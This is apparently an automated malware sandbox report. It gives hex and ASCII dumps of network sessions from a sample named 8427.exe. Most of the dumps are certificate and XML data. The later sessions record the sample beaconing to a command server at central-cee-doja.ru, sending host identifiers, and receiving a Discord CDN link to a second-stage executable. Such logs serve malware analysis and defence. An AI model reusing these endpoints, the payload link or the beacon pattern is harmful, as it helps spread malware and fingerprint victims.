72 67 20 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 67 3a 20 74 69 6e 79 69 6e 74 2c 20 73 6d 61 6c 6c Data Ascii: oat returns: float --> <Function Name="EXP" BuiltIn="true"> <ReturnType Type="Double" /> <Parameter Name="arg" Type="Double" Mode="In" /> </Function> ... FLOOR( arg ) arg: tinyint, small
2023-11-18 09:02:36 UTC	554	IN	Data Raw: 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 6c 65 6e 67 74 68 22 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 66 75 6e 63 74 69 6f 6e 22 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 52 4f 55 4e 44 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 44 6f 75 62 6c 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 6e 75 6d 65 72 69 63 5f 65 78 70 72 65 73 73 69 6f 6e 22 20 54 Data Ascii: <Parameter Name="length" Type="Int32" Mode="In" /> <Parameter Name="function" Type="Int32" Mode="In" /> </Function> <Function Name="ROUND" BuiltIn="true"> <ReturnType Type="Double" /> <Parameter Name="numeric_expression" T
2023-11-18 09:02:36 UTC	557	IN	Data Raw: 4e 61 6d 65 3d 22 4e 61 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4f 72 64 69 6e 61 6c 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 4f 72 64 69 6e 61 6c 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 73 4e 75 6c 6c 61 62 6c 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 49 73 4e 75 6c 6c 61 62 6c 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 43 6f 6d 70 6c 65 78 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 6f 6c 75 6d 6e 54 79 70 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 54 79 70 65 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 54 79 70 65 4e 61 Data Ascii: Name="Name" /> <cs:ScalarProperty Name="Ordinal" ColumnName="Ordinal" /> <cs:ScalarProperty Name="IsNullable" ColumnName="IsNullable" /> <cs:ComplexProperty Name="ColumnType"> <cs:ScalarProperty Name="TypeName" ColumnName="TypeNa
2023-11-18 09:02:36 UTC	561	IN	Data Raw: 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4d 61 78 4c 65 6e 67 74 68 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 52 65 74 75 72 6e 4d 61 78 4c 65 6e 67 74 68 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 50 72 65 63 69 73 69 6f 6e 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 52 65 74 75 72 6e 50 72 65 63 69 73 69 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 44 61 74 65 54 69 6d 65 50 72 65 63 69 73 69 6f 6e 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 52 65 74 75 72 6e 44 61 74 65 54 69 6d 65 50 72 65 63 69 73 69 6f 6e 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 Data Ascii: <cs:ScalarProperty Name="MaxLength" ColumnName="ReturnMaxLength" /> <cs:ScalarProperty Name="Precision" ColumnName="ReturnPrecision" /> <cs:ScalarProperty Name="DateTimePrecision" ColumnName="ReturnDateTimePrecision" /> <cs
2023-11-18 09:02:36 UTC	564	IN	Data Raw: 79 20 4e 61 6d 65 3d 22 49 64 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 61 74 61 6c 6f 67 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 43 61 74 61 6c 6f 67 4e 61 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 53 63 68 65 6d 61 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 53 63 68 65 6d 61 4e 61 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 4e 61 6d 65 22 20 2f 3e 0a 20 20 20 20 3c 2f 63 73 3a 45 6e 74 69 74 79 53 65 74 4d 61 70 70 69 6e Data Ascii: y Name="Id" ColumnName="Id" /> <cs:ScalarProperty Name="CatalogName" ColumnName="CatalogName" /> <cs:ScalarProperty Name="SchemaName" ColumnName="SchemaName" /> <cs:ScalarProperty Name="Name" ColumnName="Name" /> </cs:EntitySetMappin
2023-11-18 09:02:36 UTC	568	IN	Data Raw: 3c 63 73 3a 45 6e 74 69 74 79 54 79 70 65 4d 61 70 70 69 6e 67 20 54 79 70 65 4e 61 6d 65 3d 22 53 74 6f 72 65 2e 55 6e 69 71 75 65 43 6f 6e 73 74 72 61 69 6e 74 22 20 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 4d 61 70 70 69 6e 67 46 72 61 67 6d 65 6e 74 20 53 74 6f 72 65 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 64 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4e 61 6d 65 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 4e 61 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 63 73 3a Data Ascii: <cs:EntityTypeMapping TypeName="Store.UniqueConstraint" > <cs:MappingFragment StoreEntitySet="SViewConstraints"> <cs:ScalarProperty Name="Id" ColumnName="Id" /> <cs:ScalarProperty Name="Name" ColumnName="Name" /> <cs:
2023-11-18 09:02:36 UTC	572	IN	Data Raw: 43 6f 6e 73 74 72 61 69 6e 74 43 6f 6c 75 6d 6e 73 22 20 54 79 70 65 4e 61 6d 65 3d 22 53 74 6f 72 65 2e 54 61 62 6c 65 4f 72 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 43 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 3c 63 73 3a 45 6e 64 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 64 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 63 73 3a 45 6e 64 50 72 6f 70 65 72 74 79 3e 0a 20 20 20 20 20 20 3c 63 73 3a 45 6e 64 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 Data Ascii: ConstraintColumns" TypeName="Store.TableOrViewConstraintColumn"> <cs:EndProperty Name="Constraint"> <cs:ScalarProperty Name="Id" ColumnName="ConstraintId" /> </cs:EndProperty> <cs:EndProperty Name="Column"> <cs:ScalarProp
2023-11-18 09:02:36 UTC	575	IN	Data Raw: 79 20 4e 61 6d 65 3d 22 43 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 3c 63 73 3a 53 63 61 6c 61 72 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 64 22 20 43 6f 6c 75 6d 6e 4e 61 6d 65 3d 22 54 6f 43 6f 6c 75 6d 6e 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 63 73 3a 45 6e 64 50 72 6f 70 65 72 74 79 3e 0a 20 20 20 20 3c 2f 63 73 3a 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 4d 61 70 70 69 6e 67 3e 0a 0a 20 20 20 20 3c 63 73 3a 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 4d 61 70 70 69 6e 67 20 4e 61 6d 65 3d 22 46 72 6f 6d 56 69 65 77 46 6f 72 65 69 67 6e 4b 65 79 43 6f 6c 75 6d 6e 73 22 20 53 74 6f 72 65 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 46 6f 72 65 69 67 6e 4b 65 79 73 22 20 54 79 70 65 4e 61 6d 65 3d 22 53 74 6f 72 65 2e 46 72 6f 6d Data Ascii: y Name="Column"> <cs:ScalarProperty Name="Id" ColumnName="ToColumnId" /> </cs:EndProperty> </cs:AssociationSetMapping> <cs:AssociationSetMapping Name="FromViewForeignKeyColumns" StoreEntitySet="SViewForeignKeys" TypeName="Store.From
2023-11-18 09:02:36 UTC	579	IN	Data Raw: 00 30 21 30 09 06 05 2b 0e 03 02 1a 05 00 04 14 99 65 26 d7 c9 e8 76 61 13 07 44 be 3f 37 0f 19 ae 9f 33 c1 a0 82 0e d3 30 82 06 b0 30 82 04 98 a0 03 02 01 02 02 10 08 ad 40 b2 60 d2 9c 4c 9f 5e cd a9 bd 93 ae d9 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0c 05 00 30 62 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 15 30 13 06 03 55 04 0a 13 0c 44 69 67 69 43 65 72 74 20 49 6e 63 31 19 30 17 06 03 55 04 0b 13 10 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 31 21 30 1f 06 03 55 04 03 13 18 44 69 67 69 43 65 72 74 20 54 72 75 73 74 65 64 20 52 6f 6f 74 20 47 34 30 1e 17 0d 32 31 30 34 32 39 30 30 30 30 30 30 5a 17 0d 33 36 30 34 32 38 32 33 35 39 35 39 5a 30 69 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 17 30 15 06 03 55 04 0a 13 0e 44 69 67 69 43 65 72 74 2c 20 49 Data Ascii: 0!0+e&vaD?7300@`L^0*H0b10UUS10UDigiCert Inc10Uwww.digicert.com1!0UDigiCert Trusted Root G40210429000000Z360428235959Z0i10UUS10UDigiCert, I
2023-11-18 09:02:36 UTC	584	IN	Data Raw: e4 fe 6a 50 d4 d7 a3 09 5d 8e 26 d7 46 f2 c9 f5 aa 57 e2 29 c1 93 23 8e 1c cd b4 c2 ab 8d 25 f7 73 a9 7d ae 79 59 49 cc e8 15 c3 72 9a af 4b 7c b2 4c 62 c1 c4 b7 7e 2c bb e3 b3 3b b0 0d 43 c3 e6 5c f4 05 65 c4 25 d6 81 e6 97 99 bb af 4e 47 a4 b2 dd 4a 20 0d 27 d2 71 10 79 d9 1b fe d7 81 33 3e 17 d2 d4 c9 ca bc 4a b4 a6 e3 66 77 3d cf b6 35 a9 6c 9a 39 03 e6 b7 f2 0e ec 90 e3 15 6b e1 d4 de 39 1e 29 e4 a5 8c 01 3e 7a 8c 8f cd e2 16 bf 48 8b cc 88 00 9d 70 8d 29 d7 50 b3 61 1f d5 6a 9d d5 1d b8 e6 22 fe 31 f9 be c5 b6 ca ed 6e 43 77 0d ab dc da 7b 62 22 01 cd a3 dc c7 db 77 c6 76 3e 96 2c ce ce 1b ce 02 9b de 67 bb aa 4e 26 62 30 bd 04 69 6b 00 25 5c 69 69 2a 66 a4 14 0f 62 fb 9c 8b cc 1c 0b 76 3e 8e 18 dd 52 04 96 17 4e af 58 4d e6 5f a2 8e 1c 35 35 5b 5d Data Ascii: jP]&FW)#%s}yYIrK\|Lb~,;C\e%NGJ 'qy3>Jfw=5l9k9)>zHp)Paj"1nCw{b"wv>,gN&b0ik%\ii*fbv>RNXM_55[]
2023-11-18 09:02:36 UTC	587	IN	Data Raw: 89 38 61 4d 62 46 24 87 63 8c 91 52 2c af 29 89 e5 78 1f d6 0b 14 a5 80 d7 12 47 70 b3 75 d5 93 85 93 7e b6 92 67 fb 53 61 89 a8 f5 6b 96 c0 f4 58 69 0d 7c c8 01 b1 b9 28 75 b7 99 63 85 22 8c 61 ca 79 94 7e 59 fc 8c 0f e3 6f b5 01 26 b6 6c a5 ee 87 51 21 e4 58 60 9b ba 0c 2d 2b 6d a2 c4 7e bb c4 25 2b 47 02 08 7c 49 ae 13 b6 e1 7c 42 42 28 c6 18 56 cf 41 34 b6 66 5d b6 74 7b f5 56 33 22 2f 22 36 b2 4b a2 4a 95 d8 f5 a6 8e 52 31 82 02 86 30 82 02 82 02 01 01 30 81 86 30 72 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 15 30 13 06 03 55 04 0a 13 0c 44 69 67 69 43 65 72 74 20 49 6e 63 31 19 30 17 06 03 55 04 0b 13 10 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 31 31 30 2f 06 03 55 04 03 13 28 44 69 67 69 43 65 72 74 20 53 48 41 32 20 41 73 73 75 72 65 64 20 Data Ascii: 8aMbF$cR,)xGpu~gSakXi\|(uc"ay~Yo&lQ!X`-+m~%+G\|I\|BB(VA4f]t{V3"/"6KJR1000r10UUS10UDigiCert Inc10Uwww.digicert.com110/U(DigiCert SHA2 Assured
2023-11-18 09:02:36 UTC	591	IN	Data Raw: 41 31 2e 63 72 74 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 02 01 00 c1 c5 88 1e 52 0c c5 47 85 58 65 15 84 80 69 e6 b2 2d 3e b5 b4 6b 93 10 28 75 da 6d d7 8a 3b 86 4b e8 75 95 68 26 00 1f 45 86 4f 80 25 fc 55 8b d2 5b 40 2f 55 45 19 c4 09 b6 1f 04 4f 64 50 db 02 39 5c db a9 bd 53 09 d9 c8 e1 f3 f1 ce 4a 32 7b cc e7 8f 68 3e 83 47 48 4c 82 0a ff 56 96 45 3d e8 d4 0b 9c c4 23 5e ca a0 b4 84 77 68 f1 98 8c a5 d4 90 8d d8 03 ed 0e 88 58 fe 54 16 67 a1 92 84 66 26 41 fc 78 37 b5 d9 aa d5 fb 50 da f4 c9 f1 c3 ae ba 7e b7 c7 b5 82 00 7c dd a7 6c 60 25 aa b7 f8 26 8a c0 51 b9 00 a9 00 cb cc d7 82 4b 8e 8f 8e fa ac be 2b 9b 4e 00 99 d4 d1 58 97 fb 19 a5 c4 b8 21 4a 71 5f 79 13 52 7c 43 58 51 33 14 81 ea c4 03 e4 Data Ascii: A1.crt0U00*HRGXei->k(um;Kuh&EO%U[@/UEOdP9\SJ2{h>GHLVE=#^whXTgf&Ax7P~\|l`%&QK+NX!Jq_yR\|CXQ3
2023-11-18 09:02:36 UTC	595	IN	Data Raw: fb 53 61 89 a8 f5 6b 96 c0 f4 58 69 0d 7c c8 01 b1 b9 28 75 b7 99 63 85 22 8c 61 ca 79 94 7e 59 fc 8c 0f e3 6f b5 01 26 b6 6c a5 ee 87 51 21 e4 58 60 9b ba 0c 2d 2b 6d a2 c4 7e bb c4 25 2b 47 02 08 7c 49 ae 13 b6 e1 7c 42 42 28 c6 18 56 cf 41 34 b6 66 5d b6 74 7b f5 56 33 22 2f 22 36 b2 4b a2 4a 95 d8 f5 a6 8e 52 31 82 02 a6 30 82 02 a2 02 01 01 30 81 86 30 72 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 15 30 13 06 03 55 04 0a 13 0c 44 69 67 69 43 65 72 74 20 49 6e 63 31 19 30 17 06 03 55 04 0b 13 10 77 77 77 2e 64 69 67 69 63 65 72 74 2e 63 6f 6d 31 31 30 2f 06 03 55 04 03 13 28 44 69 67 69 43 65 72 74 20 53 48 41 32 20 41 73 73 75 72 65 64 20 49 44 20 54 69 6d 65 73 74 61 6d 70 69 6e 67 20 43 41 02 10 0d 42 4a e0 be 3a 88 ff 60 40 21 ce 14 00 f0 dd 30 0d Data Ascii: SakXi\|(uc"ay~Yo&lQ!X`-+m~%+G\|I\|BB(VA4f]t{V3"/"6KJR1000r10UUS10UDigiCert Inc10Uwww.digicert.com110/U(DigiCert SHA2 Assured ID Timestamping CABJ:`@!0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.4	49802	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:07 UTC	10665	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:08 UTC	10665	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q5YYsWA3a8Cdxy9AZN3aYPNdfCWLkdDe8DaR8rYcVGiCIwIRiKfiEQiZWR3mB%2FQ4fHOhag6HR9ts%2FuVEaDkgXNUKKivNPUhcu2TRVvMsScI1fMemqcz9Zxz4OqaeG7qAS9cvfHAz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09d9c81130b1-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:08 UTC	10666	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:08 UTC	10666	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	104.21.89.193	443	192.168.2.4	49802	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:07 UTC	10665	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:08 UTC	10665	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q5YYsWA3a8Cdxy9AZN3aYPNdfCWLkdDe8DaR8rYcVGiCIwIRiKfiEQiZWR3mB%2FQ4fHOhag6HR9ts%2FuVEaDkgXNUKKivNPUhcu2TRVvMsScI1fMemqcz9Zxz4OqaeG7qAS9cvfHAz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09d9c81130b1-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:08 UTC	10666	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:08 UTC	10666	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	104.21.89.193	443	192.168.2.4	49805	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:08 UTC	10666	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:09 UTC	10666	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VcPxYXAHM%2BdLd5AM0uZ%2BiBDV9oIWwoJ0ZW2FBzdu5HoGvCxytzqNoc2mosDaGevzwsaSX0sfoG0%2B7%2B2IEZTVltWKS1bkmV%2Bs8V0HkboDUyukQ84afBLIff7l6lsSFVKc%2Bw%2Fk7OBN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09e16c5cc694-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:09 UTC	10667	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:09 UTC	10667	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.4	49805	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:08 UTC	10666	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:09 UTC	10666	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VcPxYXAHM%2BdLd5AM0uZ%2BiBDV9oIWwoJ0ZW2FBzdu5HoGvCxytzqNoc2mosDaGevzwsaSX0sfoG0%2B7%2B2IEZTVltWKS1bkmV%2Bs8V0HkboDUyukQ84afBLIff7l6lsSFVKc%2Bw%2Fk7OBN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09e16c5cc694-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:09 UTC	10667	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:09 UTC	10667	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	104.21.89.193	443	192.168.2.4	49807	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:09 UTC	10667	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:10 UTC	10667	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RVODK%2Be2fhAEuhFHFnPtQvW8PAT8EODYSv5EGIhiievRN3tibem0No0CeSQPSxBOxFoVmVwtDSfjCMfiNXt5srtN2%2FuPj%2BEksAnp89JYztxTyMGIPQmYOqAJ3INXKMiI9CXmDIpH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09e7ed19c5f1-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:10 UTC	10668	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:10 UTC	10668	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.4	49807	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:09 UTC	10667	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:10 UTC	10667	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RVODK%2Be2fhAEuhFHFnPtQvW8PAT8EODYSv5EGIhiievRN3tibem0No0CeSQPSxBOxFoVmVwtDSfjCMfiNXt5srtN2%2FuPj%2BEksAnp89JYztxTyMGIPQmYOqAJ3INXKMiI9CXmDIpH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f09e7ed19c5f1-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:10 UTC	10668	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:10 UTC	10668	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	104.21.89.193	443	192.168.2.4	49808	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:11 UTC	10668	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
